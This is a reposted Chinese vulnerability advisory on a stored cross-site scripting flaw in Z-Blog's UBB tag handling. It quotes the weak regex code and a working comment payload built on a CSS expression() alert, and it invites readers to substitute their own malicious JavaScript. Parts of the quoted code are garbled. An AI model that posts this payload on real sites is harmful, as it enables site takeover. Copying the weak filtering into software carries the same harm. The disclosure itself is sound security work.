Z-blog又一严重跨站脚本攻击漏洞 's

admin 2017年4月19日22:27:05评论216 views字数 1427阅读4分45秒阅读模式
摘要

漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持 Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z- blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是在上次的xss漏洞被公布后,80sec在产品中又发现一个严重的 跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。

漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持 Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z- blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是在上次的xss漏洞被公布后,80sec在产品中又发现一个严重的 跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。

漏洞厂商:http://www.rainbowsoft.org/

漏洞解析:在FUNCTION/c_function.asp中,程序处理UBB标签的时候存在漏洞,导致任何用户可以在目标页面内执行任意js代码,利用该代码恶意用户可以获取目标站点的所有权限。漏洞代码如下:

 Function UBBCode(ByVal strContent,strType)  Dim objRegExp Set objRegExp=new RegExp objRegExp.IgnoreCase =True objRegExp.Global=True  If ZC_UBB_LINK_ENABLE And Instr(strType,"
“)>0 Then objRegExp.Pattern=”(/[URL/])(([a-zA-Z0-9]+?)://///S+?)(/[//URL/])” strContent= objRegExp.Replace(strContent,”$2“) objRegExp.Pattern=”(/[URL/])(.+?)(/[//URL/])” strContent= objRegExp.Replace(strContent,”$2“) objRegExp.Pattern=”(/[URL=)(([a-zA-Z0-9]+?)://///S+?)(/])(.+?)(/[//URL/])” strContent= objRegExp.Replace(strContent,”$5“) objRegExp.Pattern=”(/[URL=)(/S+?)(/])(/S+?)(/[//URL/])” strContent= objRegExp.Replace(strContent,”$4“) objRegExp.Pattern=”(/[EMAIL/])(/S+/@/S+?)(/[//EMAIL/])” strContent= objRegExp.Replace(strContent,”$2“) objRegExp.Pattern=”(/[EMAIL=)(/S+/@/S+?)(/])(.+?)(/[//EMAIL/])” strContent= objRegExp.Replace(strContent,”$4“) End If

可以看到其中的正则表达式过滤并不严格,这种循环匹配也很容易出现逻辑问题,精心构造代码即可触发跨站脚本漏洞,可以发表评论如下

[URL][URL]http://=”style=’c:expression(alert())'[/URL][/URL]

上面代码将循环执行alert(),当然,你也可以引入自己的恶意js执行:)

漏洞状态:该漏洞非常危险,完全不需要任何交互行为即可完成攻击,已经通知官方,请等候官方反应.

本站内容均为原创,转载请务必保留署名与链接!
Z-blog又一严重跨站脚本攻击漏洞:http://www.80sec.com/zblog-xss.html

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月19日22:27:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Z-blog又一严重跨站脚本攻击漏洞 'shttp://cn-sec.com/archives/45297.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息